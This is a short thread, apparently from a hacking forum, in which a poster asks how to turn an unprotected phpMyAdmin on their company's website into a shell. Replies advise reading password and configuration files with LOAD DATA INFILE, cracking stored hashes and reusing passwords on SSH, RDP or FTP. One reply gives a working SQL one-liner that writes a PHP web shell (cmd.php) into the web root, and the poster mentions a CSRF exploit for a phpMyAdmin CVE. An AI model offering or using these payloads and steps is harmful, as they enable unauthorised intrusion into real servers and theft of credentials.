I found a not secured Phpmyadmin
#1
I found a not secured phpmyadmin as in no password.

Is there a way to use this to install a shell? I found a writing about using the OUTPUT command in SQL to create a phpshell but I found out that the default user of the phpmyadmin can't execute OUTPUT due to permission problem. 

The default user can create, edit and delete database or table.

This is our company website I tried to show it to them but they ignore it coz they are not currently using phpmyadmin because they accidentally deleted the wordpress files.


Thank you!
Reply
#2
Do you mean the OUTFILE command?

And if so... what user is the default user? maybe that user doesn't have write access to the locations youve tried... but that doesn't necessarily mean they have 0 access to the file system.

How about the LOAD DATA/INFILE command? perhaps you can use that to read information you wouldn't otherwise have access to. System Info, Configuration Files, Password Files, Sensitive docs, etc etc...

Are there any user accounts still in the database? can you crack the hashes? its not uncommon for people to reuse their passwords. maybe the password for the admin account is the same as the rdp or ssh or ftp account...
Reply
#3
Code:
select “<? System($_REQUEST[‘cmd’]); ?>” into outfile “/opt/lampp/htdocs/cmd.php”;

2 seconds of googling.
Reply
#4
(06-07-2016, 08:37 PM)Sehaal Wrote:
Code:
select “<? System($_REQUEST[‘cmd’]); ?>” into outfile “/opt/lampp/htdocs/cmd.php”;

2 seconds of googling.

And clearly 0 seconds reading or comprehending the thread.
Reply
#5
Yes sir the output command and Load Data/Infile is also blocked.

I found some exploits for phpmyadmin 4.1.14 but sadly they are not disclose to public especially this one CVE-2014-6300 which you can get admin access using csrf.
Reply